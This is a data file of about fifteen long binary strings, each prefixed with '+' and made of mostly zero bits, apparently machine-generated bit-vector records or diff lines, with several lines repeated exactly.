+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000001000110101000011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000001011001011110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011110000110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011110000110111111111111111111111111111111111111111111111111 